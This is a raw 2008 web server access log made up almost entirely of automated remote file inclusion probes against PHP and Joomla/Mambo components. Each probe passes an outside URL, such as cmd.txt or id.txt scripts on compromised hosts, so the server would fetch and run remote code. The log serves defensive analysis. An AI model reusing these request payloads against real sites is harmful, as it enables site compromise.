165.138.51.197 - - [17/Mar/2008:07:16:11 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:16:13 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:16:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:16:24 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:16:44 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:16:45 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:16:45 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:17:38 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:17:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:17:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:17:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.19.135.21 - - [17/Mar/2008:07:18:11 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:07:18:13 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pathttp://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:07:18:13 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pathttp://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:18:16 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:18:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Mar/2008:07:18:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.tovr.com/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:07:18:31 -0700] "GET /logs/access_080220.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:18:45 -0700] "GET /logs/access_080120.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:18:45 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:18:46 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:07:18:49 -0700] "GET /logs/access_080122.log///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:19:09 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.182.170 - - [17/Mar/2008:07:19:34 -0700] "GET /logs/access_080119.log/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.182.170 - - [17/Mar/2008:07:19:35 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:07:19:51 -0700] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:20:12 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [17/Mar/2008:07:20:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:07:20:24 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:07:20:25 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [17/Mar/2008:07:20:25 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.139.166.8 - - [17/Mar/2008:07:20:33 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
213.139.166.8 - - [17/Mar/2008:07:20:33 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.72.117.156 - - [17/Mar/2008:07:21:11 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:07:21:25 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:07:21:27 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:07:21:27 -0700] "GET //becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:07:21:27 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:21:28 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:21:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:21:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:07:21:31 -0700] "GET //becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:07:21:31 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.140.91.131 - - [17/Mar/2008:07:21:47 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.140.91.131 - - [17/Mar/2008:07:21:47 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:21:53 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:07:21:54 -0700] "GET /logs/access_080228.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pathttp://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:21:56 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:21:59 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
66.55.132.16 - - [17/Mar/2008:07:22:43 -0700] "GET /logs/access_080207.log//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.243.117 - - [17/Mar/2008:07:22:50 -0700] "GET /logs/access_080207.log//becommunity/community/index.php?pageurl=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.76.163.42 - - [17/Mar/2008:07:22:54 -0700] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
201.76.163.42 - - [17/Mar/2008:07:22:54 -0700] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
212.227.48.50 - - [17/Mar/2008:07:23:09 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:23:49 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:23:49 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:24:32 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:07:24:48 -0700] "GET /logs/access_080124.log/myevent.php?myevent_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:07:25:33 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:07:25:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.104 - - [17/Mar/2008:07:25:34 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:07:25:34 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:07:25:38 -0700] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.137 - - [17/Mar/2008:07:26:03 -0700] "GET //skin/zero_vote/error.php?dir=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:07:26:04 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:07:26:04 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Mar/2008:07:26:04 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.182.170 - - [17/Mar/2008:07:26:05 -0700] "GET /logs/access_080122.log/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:26:28 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:26:49 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.19.135.21 - - [17/Mar/2008:07:26:54 -0700] "GET /logs/access_080119.log/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.135.21 - - [17/Mar/2008:07:26:55 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:26:57 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:26:58 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:26:59 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:26:59 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:27:01 -0700] "GET /errors.php?error=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:27:03 -0700] "GET /logs/errors.php?error=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.215.223.191 - - [17/Mar/2008:07:27:09 -0700] "GET /index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.215.223.191 - - [17/Mar/2008:07:27:12 -0700] "GET /logs/index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:28:03 -0700] "GET /settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:28:03 -0700] "GET /settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:28:04 -0700] "GET /settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:07:28:47 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:07:28:57 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:07:28:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:07:28:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.173.66 - - [17/Mar/2008:07:29:03 -0700] "GET /logs//gastbok5/admin.php?include_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.246.173.66 - - [17/Mar/2008:07:29:03 -0700] "GET //gastbok5/admin.php?include_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.117.156 - - [17/Mar/2008:07:30:21 -0700] "GET /logs/access_080119.log/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [17/Mar/2008:07:30:21 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:07:30:45 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.135.21 - - [17/Mar/2008:07:31:28 -0700] "GET /logs/access_080122.log/modules/xfsection/modify.php?dir_module=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.173.70 - - [17/Mar/2008:07:31:40 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.68.63.251 - - [17/Mar/2008:07:32:39 -0700] "GET /logs/access_080211.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.68.63.251 - - [17/Mar/2008:07:32:39 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.68.63.251 - - [17/Mar/2008:07:32:39 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:33:07 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:33:07 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:33:58 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:07:33:58 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:33:58 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:33:59 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:34:03 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:34:03 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:34:03 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.76.163.42 - - [17/Mar/2008:07:34:06 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
